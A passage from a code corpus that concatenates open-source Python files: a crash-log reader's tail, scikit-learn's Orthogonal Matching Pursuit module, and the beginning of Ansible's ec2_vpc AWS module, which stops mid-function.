def is_crash_log(fs, dirpath, basename):
return basename.startswith("CrashLog")
logs = self._host.filesystem.files_under(self._results_directory, file_filter=is_crash_log)
errors = ''
for path in reversed(sorted(logs)):
try:
if not newer_than or self._host.filesystem.mtime(path) > newer_than:
log_file = self._host.filesystem.read_binary_file(path).decode('utf8', 'ignore')
match = self.PID_LINE_REGEX.search(log_file)
if match is None:
continue
if int(match.group('pid')) == pid:
return errors + log_file
except IOError, e:
print "IOError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except OSError, e:
print "OSError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except UnicodeDecodeError, e:
print "UnicodeDecodeError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to decode '%s' as utf8: %s\n" % (path, str(e))
if include_errors and errors:
return errors
return None
| bsd-3-clause |
tawsifkhan/scikit-learn | sklearn/linear_model/omp.py | 127 | 30417 | """Orthogonal matching pursuit algorithms
"""
# Author: Vlad Niculae
#
# License: BSD 3 clause
import warnings
from distutils.version import LooseVersion
import numpy as np
from scipy import linalg
from scipy.linalg.lapack import get_lapack_funcs
from .base import LinearModel, _pre_fit
from ..base import RegressorMixin
from ..utils import as_float_array, check_array, check_X_y
from ..cross_validation import check_cv
from ..externals.joblib import Parallel, delayed
import scipy
solve_triangular_args = {}
if LooseVersion(scipy.__version__) >= LooseVersion('0.12'):
# check_finite=False is an optimization available only in scipy >=0.12
solve_triangular_args = {'check_finite': False}
premature = """ Orthogonal matching pursuit ended prematurely due to linear
dependence in the dictionary. The requested precision might not have been met.
"""
def _cholesky_omp(X, y, n_nonzero_coefs, tol=None, copy_X=True,
return_path=False):
"""Orthogonal Matching Pursuit step using the Cholesky decomposition.
Parameters
----------
X : array, shape (n_samples, n_features)
Input dictionary. Columns are assumed to have unit norm.
y : array, shape (n_samples,)
Input targets
n_nonzero_coefs : int
Targeted number of non-zero elements
tol : float
Targeted squared error, if not None overrides n_nonzero_coefs.
copy_X : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
gamma : array, shape (n_nonzero_coefs,)
Non-zero elements of the solution
idx : array, shape (n_nonzero_coefs,)
Indices of the positions of the elements in gamma within the solution
vector
coef : array, shape (n_features, n_nonzero_coefs)
The first k values of column k correspond to the coefficient value
for the active features at that step. The lower left triangle contains
garbage. Only returned if ``return_path=True``.
n_active : int
Number of active features at convergence.
"""
if copy_X:
X = X.copy('F')
else: # even if we are allowed to overwrite, still copy it if bad order
X = np.asfortranarray(X)
min_float = np.finfo(X.dtype).eps
nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (X,))
potrs, = get_lapack_funcs(('potrs',), (X,))
alpha = np.dot(X.T, y)
residual = y
gamma = np.empty(0)
n_active = 0
indices = np.arange(X.shape[1]) # keeping track of swapping
max_features = X.shape[1] if tol is not None else n_nonzero_coefs
if solve_triangular_args:
# new scipy, don't need to initialize because check_finite=False
L = np.empty((max_features, max_features), dtype=X.dtype)
else:
# old scipy, we need the garbage upper triangle to be non-Inf
L = np.zeros((max_features, max_features), dtype=X.dtype)
L[0, 0] = 1.
if return_path:
coefs = np.empty_like(L)
while True:
lam = np.argmax(np.abs(np.dot(X.T, residual)))
if lam < n_active or alpha[lam] ** 2 < min_float:
# atom already selected or inner product too small
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
if n_active > 0:
# Updates the Cholesky decomposition of X' X
L[n_active, :n_active] = np.dot(X[:, :n_active].T, X[:, lam])
linalg.solve_triangular(L[:n_active, :n_active],
L[n_active, :n_active],
trans=0, lower=1,
overwrite_b=True,
**solve_triangular_args)
v = nrm2(L[n_active, :n_active]) ** 2
if 1 - v <= min_float: # selected atoms are dependent
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
L[n_active, n_active] = np.sqrt(1 - v)
X.T[n_active], X.T[lam] = swap(X.T[n_active], X.T[lam])
alpha[n_active], alpha[lam] = alpha[lam], alpha[n_active]
indices[n_active], indices[lam] = indices[lam], indices[n_active]
n_active += 1
# solves LL'x = y as a composition of two triangular systems
gamma, _ = potrs(L[:n_active, :n_active], alpha[:n_active], lower=True,
overwrite_b=False)
if return_path:
coefs[:n_active, n_active - 1] = gamma
residual = y - np.dot(X[:, :n_active], gamma)
if tol is not None and nrm2(residual) ** 2 <= tol:
break
elif n_active == max_features:
break
if return_path:
return gamma, indices[:n_active], coefs[:, :n_active], n_active
else:
return gamma, indices[:n_active], n_active
def _gram_omp(Gram, Xy, n_nonzero_coefs, tol_0=None, tol=None,
copy_Gram=True, copy_Xy=True, return_path=False):
"""Orthogonal Matching Pursuit step on a precomputed Gram matrix.
This function uses the the Cholesky decomposition method.
Parameters
----------
Gram : array, shape (n_features, n_features)
Gram matrix of the input data matrix
Xy : array, shape (n_features,)
Input targets
n_nonzero_coefs : int
Targeted number of non-zero elements
tol_0 : float
Squared norm of y, required if tol is not None.
tol : float
Targeted squared error, if not None overrides n_nonzero_coefs.
copy_Gram : bool, optional
Whether the gram matrix must be copied by the algorithm. A false
value is only helpful if it is already Fortran-ordered, otherwise a
copy is made anyway.
copy_Xy : bool, optional
Whether the covariance vector Xy must be copied by the algorithm.
If False, it may be overwritten.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
gamma : array, shape (n_nonzero_coefs,)
Non-zero elements of the solution
idx : array, shape (n_nonzero_coefs,)
Indices of the positions of the elements in gamma within the solution
vector
coefs : array, shape (n_features, n_nonzero_coefs)
The first k values of column k correspond to the coefficient value
for the active features at that step. The lower left triangle contains
garbage. Only returned if ``return_path=True``.
n_active : int
Number of active features at convergence.
"""
Gram = Gram.copy('F') if copy_Gram else np.asfortranarray(Gram)
if copy_Xy:
Xy = Xy.copy()
min_float = np.finfo(Gram.dtype).eps
nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (Gram,))
potrs, = get_lapack_funcs(('potrs',), (Gram,))
indices = np.arange(len(Gram)) # keeping track of swapping
alpha = Xy
tol_curr = tol_0
delta = 0
gamma = np.empty(0)
n_active = 0
max_features = len(Gram) if tol is not None else n_nonzero_coefs
if solve_triangular_args:
# new scipy, don't need to initialize because check_finite=False
L = np.empty((max_features, max_features), dtype=Gram.dtype)
else:
# old scipy, we need the garbage upper triangle to be non-Inf
L = np.zeros((max_features, max_features), dtype=Gram.dtype)
L[0, 0] = 1.
if return_path:
coefs = np.empty_like(L)
while True:
lam = np.argmax(np.abs(alpha))
if lam < n_active or alpha[lam] ** 2 < min_float:
# selected same atom twice, or inner product too small
warnings.warn(premature, RuntimeWarning, stacklevel=3)
break
if n_active > 0:
L[n_active, :n_active] = Gram[lam, :n_active]
linalg.solve_triangular(L[:n_active, :n_active],
L[n_active, :n_active],
trans=0, lower=1,
overwrite_b=True,
**solve_triangular_args)
v = nrm2(L[n_active, :n_active]) ** 2
if 1 - v <= min_float: # selected atoms are dependent
warnings.warn(premature, RuntimeWarning, stacklevel=3)
break
L[n_active, n_active] = np.sqrt(1 - v)
Gram[n_active], Gram[lam] = swap(Gram[n_active], Gram[lam])
Gram.T[n_active], Gram.T[lam] = swap(Gram.T[n_active], Gram.T[lam])
indices[n_active], indices[lam] = indices[lam], indices[n_active]
Xy[n_active], Xy[lam] = Xy[lam], Xy[n_active]
n_active += 1
# solves LL'x = y as a composition of two triangular systems
gamma, _ = potrs(L[:n_active, :n_active], Xy[:n_active], lower=True,
overwrite_b=False)
if return_path:
coefs[:n_active, n_active - 1] = gamma
beta = np.dot(Gram[:, :n_active], gamma)
alpha = Xy - beta
if tol is not None:
tol_curr += delta
delta = np.inner(gamma, beta[:n_active])
tol_curr -= delta
if abs(tol_curr) <= tol:
break
elif n_active == max_features:
break
if return_path:
return gamma, indices[:n_active], coefs[:, :n_active], n_active
else:
return gamma, indices[:n_active], n_active
def orthogonal_mp(X, y, n_nonzero_coefs=None, tol=None, precompute=False,
copy_X=True, return_path=False,
return_n_iter=False):
"""Orthogonal Matching Pursuit (OMP)
Solves n_targets Orthogonal Matching Pursuit problems.
An instance of the problem has the form:
When parametrized by the number of non-zero coefficients using
`n_nonzero_coefs`:
argmin ||y - X\gamma||^2 subject to ||\gamma||_0 <= n_{nonzero coefs}
When parametrized by error using the parameter `tol`:
argmin ||\gamma||_0 subject to ||y - X\gamma||^2 <= tol
Read more in the :ref:`User Guide <omp>`.
Parameters
----------
X : array, shape (n_samples, n_features)
Input data. Columns are assumed to have unit norm.
y : array, shape (n_samples,) or (n_samples, n_targets)
Input targets
n_nonzero_coefs : int
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
precompute : {True, False, 'auto'},
Whether to perform precomputations. Improves performance when n_targets
or n_samples is very large.
copy_X : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
return_n_iter : bool, optional default False
Whether or not to return the number of iterations.
Returns
-------
coef : array, shape (n_features,) or (n_features, n_targets)
Coefficients of the OMP solution. If `return_path=True`, this contains
the whole coefficient path. In this case its shape is
(n_features, n_features) or (n_features, n_targets, n_features) and
iterating over the last axis yields coefficients in increasing order
of active features.
n_iters : array-like or int
Number of active features across every target. Returned only if
`return_n_iter` is set to True.
See also
--------
OrthogonalMatchingPursuit
orthogonal_mp_gram
lars_path
decomposition.sparse_encode
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
"""
X = check_array(X, order='F', copy=copy_X)
copy_X = False
if y.ndim == 1:
y = y.reshape(-1, 1)
y = check_array(y)
if y.shape[1] > 1: # subsequent targets will be affected
copy_X = True
if n_nonzero_coefs is None and tol is None:
# default for n_nonzero_coefs is 0.1 * n_features
# but at least one.
n_nonzero_coefs = max(int(0.1 * X.shape[1]), 1)
if tol is not None and tol < 0:
raise ValueError("Epsilon cannot be negative")
if tol is None and n_nonzero_coefs <= 0:
raise ValueError("The number of atoms must be positive")
if tol is None and n_nonzero_coefs > X.shape[1]:
raise ValueError("The number of atoms cannot be more than the number "
"of features")
if precompute == 'auto':
precompute = X.shape[0] > X.shape[1]
if precompute:
G = np.dot(X.T, X)
G = np.asfortranarray(G)
Xy = np.dot(X.T, y)
if tol is not None:
norms_squared = np.sum((y ** 2), axis=0)
else:
norms_squared = None
return orthogonal_mp_gram(G, Xy, n_nonzero_coefs, tol, norms_squared,
copy_Gram=copy_X, copy_Xy=False,
return_path=return_path)
if return_path:
coef = np.zeros((X.shape[1], y.shape[1], X.shape[1]))
else:
coef = np.zeros((X.shape[1], y.shape[1]))
n_iters = []
for k in range(y.shape[1]):
out = _cholesky_omp(
X, y[:, k], n_nonzero_coefs, tol,
copy_X=copy_X, return_path=return_path)
if return_path:
_, idx, coefs, n_iter = out
coef = coef[:, :, :len(idx)]
for n_active, x in enumerate(coefs.T):
coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
else:
x, idx, n_iter = out
coef[idx, k] = x
n_iters.append(n_iter)
if y.shape[1] == 1:
n_iters = n_iters[0]
if return_n_iter:
return np.squeeze(coef), n_iters
else:
return np.squeeze(coef)
def orthogonal_mp_gram(Gram, Xy, n_nonzero_coefs=None, tol=None,
norms_squared=None, copy_Gram=True,
copy_Xy=True, return_path=False,
return_n_iter=False):
"""Gram Orthogonal Matching Pursuit (OMP)
Solves n_targets Orthogonal Matching Pursuit problems using only
the Gram matrix X.T * X and the product X.T * y.
Read more in the :ref:`User Guide <omp>`.
Parameters
----------
Gram : array, shape (n_features, n_features)
Gram matrix of the input data: X.T * X
Xy : array, shape (n_features,) or (n_features, n_targets)
Input targets multiplied by X: X.T * y
n_nonzero_coefs : int
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
norms_squared : array-like, shape (n_targets,)
Squared L2 norms of the lines of y. Required if tol is not None.
copy_Gram : bool, optional
Whether the gram matrix must be copied by the algorithm. A false
value is only helpful if it is already Fortran-ordered, otherwise a
copy is made anyway.
copy_Xy : bool, optional
Whether the covariance vector Xy must be copied by the algorithm.
If False, it may be overwritten.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
return_n_iter : bool, optional default False
Whether or not to return the number of iterations.
Returns
-------
coef : array, shape (n_features,) or (n_features, n_targets)
Coefficients of the OMP solution. If `return_path=True`, this contains
the whole coefficient path. In this case its shape is
(n_features, n_features) or (n_features, n_targets, n_features) and
iterating over the last axis yields coefficients in increasing order
of active features.
n_iters : array-like or int
Number of active features across every target. Returned only if
`return_n_iter` is set to True.
See also
--------
OrthogonalMatchingPursuit
orthogonal_mp
lars_path
decomposition.sparse_encode
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
"""
Gram = check_array(Gram, order='F', copy=copy_Gram)
Xy = np.asarray(Xy)
if Xy.ndim > 1 and Xy.shape[1] > 1:
# or subsequent target will be affected
copy_Gram = True
if Xy.ndim == 1:
Xy = Xy[:, np.newaxis]
if tol is not None:
norms_squared = [norms_squared]
if n_nonzero_coefs is None and tol is None:
n_nonzero_coefs = int(0.1 * len(Gram))
if tol is not None and norms_squared is None:
raise ValueError('Gram OMP needs the precomputed norms in order '
'to evaluate the error sum of squares.')
if tol is not None and tol < 0:
raise ValueError("Epsilon cannot be negative")
if tol is None and n_nonzero_coefs <= 0:
raise ValueError("The number of atoms must be positive")
if tol is None and n_nonzero_coefs > len(Gram):
raise ValueError("The number of atoms cannot be more than the number "
"of features")
if return_path:
coef = np.zeros((len(Gram), Xy.shape[1], len(Gram)))
else:
coef = np.zeros((len(Gram), Xy.shape[1]))
n_iters = []
for k in range(Xy.shape[1]):
out = _gram_omp(
Gram, Xy[:, k], n_nonzero_coefs,
norms_squared[k] if tol is not None else None, tol,
copy_Gram=copy_Gram, copy_Xy=copy_Xy,
return_path=return_path)
if return_path:
_, idx, coefs, n_iter = out
coef = coef[:, :, :len(idx)]
for n_active, x in enumerate(coefs.T):
coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
else:
x, idx, n_iter = out
coef[idx, k] = x
n_iters.append(n_iter)
if Xy.shape[1] == 1:
n_iters = n_iters[0]
if return_n_iter:
return np.squeeze(coef), n_iters
else:
return np.squeeze(coef)
class OrthogonalMatchingPursuit(LinearModel, RegressorMixin):
"""Orthogonal Matching Pursuit model (OMP)
Parameters
----------
n_nonzero_coefs : int, optional
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float, optional
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If False, the regressors X are assumed to be already normalized.
precompute : {True, False, 'auto'}, default 'auto'
Whether to use a precomputed Gram and Xy matrix to speed up
calculations. Improves performance when `n_targets` or `n_samples` is
very large. Note that if you already have such matrices, you can pass
them directly to the fit method.
Read more in the :ref:`User Guide <omp>`.
Attributes
----------
coef_ : array, shape (n_features,) or (n_features, n_targets)
parameter vector (w in the formula)
intercept_ : float or array, shape (n_targets,)
independent term in decision function.
n_iter_ : int or array-like
Number of active features across every target.
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
See also
--------
orthogonal_mp
orthogonal_mp_gram
lars_path
Lars
LassoLars
decomposition.sparse_encode
"""
def __init__(self, n_nonzero_coefs=None, tol=None, fit_intercept=True,
normalize=True, precompute='auto'):
self.n_nonzero_coefs = n_nonzero_coefs
self.tol = tol
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
def fit(self, X, y):
"""Fit the model using X, y as training data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Target values.
Returns
-------
self : object
returns an instance of self.
"""
X, y = check_X_y(X, y, multi_output=True, y_numeric=True)
n_features = X.shape[1]
X, y, X_mean, y_mean, X_std, Gram, Xy = \
_pre_fit(X, y, None, self.precompute, self.normalize,
self.fit_intercept, copy=True)
if y.ndim == 1:
y = y[:, np.newaxis]
if self.n_nonzero_coefs is None and self.tol is None:
# default for n_nonzero_coefs is 0.1 * n_features
# but at least one.
self.n_nonzero_coefs_ = max(int(0.1 * n_features), 1)
else:
self.n_nonzero_coefs_ = self.n_nonzero_coefs
if Gram is False:
coef_, self.n_iter_ = orthogonal_mp(
X, y, self.n_nonzero_coefs_, self.tol,
precompute=False, copy_X=True,
return_n_iter=True)
else:
norms_sq = np.sum(y ** 2, axis=0) if self.tol is not None else None
coef_, self.n_iter_ = orthogonal_mp_gram(
Gram, Xy=Xy, n_nonzero_coefs=self.n_nonzero_coefs_,
tol=self.tol, norms_squared=norms_sq,
copy_Gram=True, copy_Xy=True,
return_n_iter=True)
self.coef_ = coef_.T
self._set_intercept(X_mean, y_mean, X_std)
return self
def _omp_path_residues(X_train, y_train, X_test, y_test, copy=True,
fit_intercept=True, normalize=True, max_iter=100):
"""Compute the residues on left-out data for a full LARS path
Parameters
-----------
X_train : array, shape (n_samples, n_features)
The data to fit the LARS on
y_train : array, shape (n_samples)
The target variable to fit LARS on
X_test : array, shape (n_samples, n_features)
The data to compute the residues on
y_test : array, shape (n_samples)
The target variable to compute the residues on
copy : boolean, optional
Whether X_train, X_test, y_train and y_test should be copied. If
False, they may be overwritten.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If True, the regressors X will be normalized before regression.
max_iter : integer, optional
Maximum numbers of iterations to perform, therefore maximum features
to include. 100 by default.
Returns
-------
residues: array, shape (n_samples, max_features)
Residues of the prediction on the test data
"""
if copy:
X_train = X_train.copy()
y_train = y_train.copy()
X_test = X_test.copy()
y_test = y_test.copy()
if fit_intercept:
X_mean = X_train.mean(axis=0)
X_train -= X_mean
X_test -= X_mean
y_mean = y_train.mean(axis=0)
y_train = as_float_array(y_train, copy=False)
y_train -= y_mean
y_test = as_float_array(y_test, copy=False)
y_test -= y_mean
if normalize:
norms = np.sqrt(np.sum(X_train ** 2, axis=0))
nonzeros = np.flatnonzero(norms)
X_train[:, nonzeros] /= norms[nonzeros]
coefs = orthogonal_mp(X_train, y_train, n_nonzero_coefs=max_iter, tol=None,
precompute=False, copy_X=False,
return_path=True)
if coefs.ndim == 1:
coefs = coefs[:, np.newaxis]
if normalize:
coefs[nonzeros] /= norms[nonzeros][:, np.newaxis]
return np.dot(coefs.T, X_test.T) - y_test
class OrthogonalMatchingPursuitCV(LinearModel, RegressorMixin):
"""Cross-validated Orthogonal Matching Pursuit model (OMP)
Parameters
----------
copy : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If False, the regressors X are assumed to be already normalized.
max_iter : integer, optional
Maximum numbers of iterations to perform, therefore maximum features
to include. 10% of ``n_features`` but at least 5 if available.
cv : cross-validation generator, optional
see :mod:`sklearn.cross_validation`. If ``None`` is passed, default to
a 5-fold strategy
n_jobs : integer, optional
Number of CPUs to use during the cross validation. If ``-1``, use
all the CPUs
verbose : boolean or integer, optional
Sets the verbosity amount
Read more in the :ref:`User Guide <omp>`.
Attributes
----------
intercept_ : float or array, shape (n_targets,)
Independent term in decision function.
coef_ : array, shape (n_features,) or (n_features, n_targets)
Parameter vector (w in the problem formulation).
n_nonzero_coefs_ : int
Estimated number of non-zero coefficients giving the best mean squared
error over the cross-validation folds.
n_iter_ : int or array-like
Number of active features across every target for the model refit with
the best hyperparameters got by cross-validating across all folds.
See also
--------
orthogonal_mp
orthogonal_mp_gram
lars_path
Lars
LassoLars
OrthogonalMatchingPursuit
LarsCV
LassoLarsCV
decomposition.sparse_encode
"""
def __init__(self, copy=True, fit_intercept=True, normalize=True,
max_iter=None, cv=None, n_jobs=1, verbose=False):
self.copy = copy
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.cv = cv
self.n_jobs = n_jobs
self.verbose = verbose
def fit(self, X, y):
"""Fit the model using X, y as training data.
Parameters
----------
X : array-like, shape [n_samples, n_features]
Training data.
y : array-like, shape [n_samples]
Target values.
Returns
-------
self : object
returns an instance of self.
"""
X, y = check_X_y(X, y, y_numeric=True)
X = as_float_array(X, copy=False, force_all_finite=False)
cv = check_cv(self.cv, X, y, classifier=False)
max_iter = (min(max(int(0.1 * X.shape[1]), 5), X.shape[1])
if not self.max_iter
else self.max_iter)
cv_paths = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
delayed(_omp_path_residues)(
X[train], y[train], X[test], y[test], self.copy,
self.fit_intercept, self.normalize, max_iter)
for train, test in cv)
min_early_stop = min(fold.shape[0] for fold in cv_paths)
mse_folds = np.array([(fold[:min_early_stop] ** 2).mean(axis=1)
for fold in cv_paths])
best_n_nonzero_coefs = np.argmin(mse_folds.mean(axis=0)) + 1
self.n_nonzero_coefs_ = best_n_nonzero_coefs
omp = OrthogonalMatchingPursuit(n_nonzero_coefs=best_n_nonzero_coefs,
fit_intercept=self.fit_intercept,
normalize=self.normalize)
omp.fit(X, y)
self.coef_ = omp.coef_
self.intercept_ = omp.intercept_
self.n_iter_ = omp.n_iter_
return self
| bsd-3-clause |
davidobrien1985/ansible-modules-core | cloud/amazon/ec2_vpc.py | 6 | 29668 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_vpc
short_description: configure AWS virtual private clouds
description:
- Create or terminates AWS virtual private clouds. This module has a dependency on python-boto.
version_added: "1.4"
options:
cidr_block:
description:
- "The cidr block representing the VPC, e.g. 10.0.0.0/16"
required: false, unless state=present
instance_tenancy:
description:
- "The supported tenancy options for instances launched into the VPC."
required: false
default: "default"
choices: [ "default", "dedicated" ]
dns_support:
description:
- toggles the "Enable DNS resolution" flag
required: false
default: "yes"
choices: [ "yes", "no" ]
dns_hostnames:
description:
- toggles the "Enable DNS hostname support for instances" flag
required: false
default: "yes"
choices: [ "yes", "no" ]
subnets:
description:
- 'A dictionary array of subnets to add of the form: { cidr: ..., az: ... , resource_tags: ... }. Where az is the desired availability zone of the subnet, but it is not required. Tags (i.e.: resource_tags) is also optional and use dictionary form: { "Environment":"Dev", "Tier":"Web", ...}. All VPC subnets not in this list will be removed as well. As of 1.8, if the subnets parameter is not specified, no existing subnets will be modified.'
required: false
default: null
resource_tags: See resource_tags for VPC below. The main difference is subnet tags not specified here will be deleted.
vpc_id:
description:
- A VPC id to terminate when state=absent
required: false
default: null
resource_tags:
description:
- 'A dictionary array of resource tags of the form: { tag1: value1, tag2: value2 }. Tags in this list are used in conjunction with CIDR block to uniquely identify a VPC in lieu of vpc_id. Therefore, if CIDR/Tag combination does not exist, a new VPC will be created. VPC tags not on this list will be ignored. Prior to 1.7, specifying a resource tag was optional.'
required: true
version_added: "1.6"
internet_gateway:
description:
- Toggle whether there should be an Internet gateway attached to the VPC
required: false
default: "no"
choices: [ "yes", "no" ]
route_tables:
description:
- 'A dictionary array of route tables to add of the form: { subnets: [172.22.2.0/24, 172.22.3.0/24,], routes: [{ dest: 0.0.0.0/0, gw: igw},], resource_tags: ... }. Where the subnets list is those subnets the route table should be associated with, and the routes list is a list of routes to be in the table. The special keyword for the gw of igw specifies that you should the route should go through the internet gateway attached to the VPC. gw also accepts instance-ids, interface-ids, and vpc-peering-connection-ids in addition igw. resource_tags is optional and uses dictionary form: { "Name": "public", ... }. This module is currently unable to affect the "main" route table due to some limitations in boto, so you must explicitly define the associated subnets or they will be attached to the main table implicitly. As of 1.8, if the route_tables parameter is not specified, no existing routes will be modified.'
required: false
default: null
wait:
description:
- wait for the VPC to be in state 'available' before returning
required: false
default: "no"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
state:
description:
- Create or terminate the VPC
required: true
choices: [ "present", "absent" ]
author: "Carson Gee (@carsongee)"
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic creation example:
ec2_vpc:
state: present
cidr_block: 172.23.0.0/16
resource_tags: { "Environment":"Development" }
region: us-west-2
# Full creation example with subnets and optional availability zones.
# The absence or presence of subnets deletes or creates them respectively.
ec2_vpc:
state: present
cidr_block: 172.22.0.0/16
resource_tags: { "Environment":"Development" }
subnets:
- cidr: 172.22.1.0/24
az: us-west-2c
resource_tags: { "Environment":"Dev", "Tier" : "Web" }
- cidr: 172.22.2.0/24
az: us-west-2b
resource_tags: { "Environment":"Dev", "Tier" : "App" }
- cidr: 172.22.3.0/24
az: us-west-2a
resource_tags: { "Environment":"Dev", "Tier" : "DB" }
internet_gateway: True
route_tables:
- subnets:
- 172.22.2.0/24
- 172.22.3.0/24
routes:
- dest: 0.0.0.0/0
gw: igw
- subnets:
- 172.22.1.0/24
routes:
- dest: 0.0.0.0/0
gw: igw
region: us-west-2
register: vpc
# Removal of a VPC by id
ec2_vpc:
state: absent
vpc_id: vpc-aaaaaaa
region: us-west-2
If you have added elements not managed by this module, e.g. instances, NATs, etc then
the delete will fail until those dependencies are removed.
'''
import time
try:
import boto.ec2
import boto.vpc
from boto.exception import EC2ResponseError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def get_vpc_info(vpc):
"""
Retrieves vpc information from an instance
ID and returns it as a dictionary
"""
return({
'id': vpc.id,
'cidr_block': vpc.cidr_block,
'dhcp_options_id': vpc.dhcp_options_id,
'region': vpc.region.name,
'state': vpc.state,
})
def find_vpc(module, vpc_conn, vpc_id=None, cidr=None):
"""
Finds a VPC that matches a specific id or cidr + tags
module : AnsibleModule object
vpc_conn: authenticated VPCConnection connection object
Returns:
A VPC object that matches either an ID or CIDR and one or more tag values
"""
if vpc_id == None and cidr == None:
module.fail_json(
msg='You must specify either a vpc_id or a cidr block + list of unique tags, aborting'
)
found_vpcs = []
resource_tags = module.params.get('resource_tags')
# Check for existing VPC by cidr_block or id
if vpc_id is not None:
found_vpcs = vpc_conn.get_all_vpcs(None, {'vpc-id': vpc_id, 'state': 'available',})
else:
previous_vpcs = vpc_conn.get_all_vpcs(None, {'cidr': cidr, 'state': 'available'})
for vpc in previous_vpcs:
# Get all tags for each of the found VPCs
vpc_tags = dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': vpc.id}))
# If the supplied list of ID Tags match a subset of the VPC Tags, we found our VPC
if resource_tags and set(resource_tags.items()).issubset(set(vpc_tags.items())):
found_vpcs.append(vpc)
found_vpc = None
if len(found_vpcs) == 1:
found_vpc = found_vpcs[0]
if len(found_vpcs) > 1:
module.fail_json(msg='Found more than one vpc based on the supplied criteria, aborting')
return (found_vpc)
def routes_match(rt_list=None, rt=None, igw=None):
"""
Check if the route table has all routes as in given list
rt_list : A list if routes provided in the module
rt : The Remote route table object
igw : The internet gateway object for this vpc
Returns:
True when there provided routes and remote routes are the same.
False when provided routes and remote routes are different.
"""
local_routes = []
remote_routes = []
for route in rt_list:
route_kwargs = {
'gateway_id': None,
'instance_id': None,
'interface_id': None,
'vpc_peering_connection_id': None,
'state': 'active'
}
if route['gw'] == 'igw':
route_kwargs['gateway_id'] = igw.id
elif route['gw'].startswith('i-'):
route_kwargs['instance_id'] = route['gw']
elif route['gw'].startswith('eni-'):
